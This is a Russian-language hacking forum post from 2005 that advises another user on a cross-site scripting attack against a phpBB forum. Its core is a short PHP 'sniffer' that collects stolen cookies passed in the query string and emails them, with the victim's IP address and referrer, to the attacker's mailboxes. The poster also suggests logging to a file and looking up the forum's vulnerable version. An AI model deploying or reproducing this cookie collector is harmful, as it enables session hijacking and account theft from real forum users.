04.12.2005, 12:21
|
|
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047
Репутация:
67
|
|
ну, во-первых, кросс-сайт-скриптинг не тока в интернете работает), ты же можешь прям в сети сниффер разместить у себя на хосте, что к сожалению при обнаружении атаки плохо отразится на твоей безопасности...
-простейший сниффер:
Код:
<?
if(isset($QUERY_STRING))
{
$date=date('d.m.y : H:i:s');
mail("mail1@mail.ru, mail2@mail.ru", "Kyka npuIIIJIa", "Date and Time: $date\n IP: $REMOTE_ADDR\n Adress: $HTTP_REFERER\n Cookie: $QUERY_STRING");
}
?>
- правда лучше сделай чтобы в файл писалось, чтобы не заморачиваться с мэйл серваками... (мануалы по php или перлу ищи на emanual.ru)
Во-вторых, насколько я понял, это все тот же форум phpbb, а вовсе не чат, но так и не нашел ответа, отличается ли он чем-нить от простого? (без плюса)
В третьих, не верится, что существует лишь одна рабочая версия этого форума, так что плз, пиши сюда нам версию, либо сам смотри на сайтах http://www.security.nnov.ru/
http://securitylab.ru/ |
|
|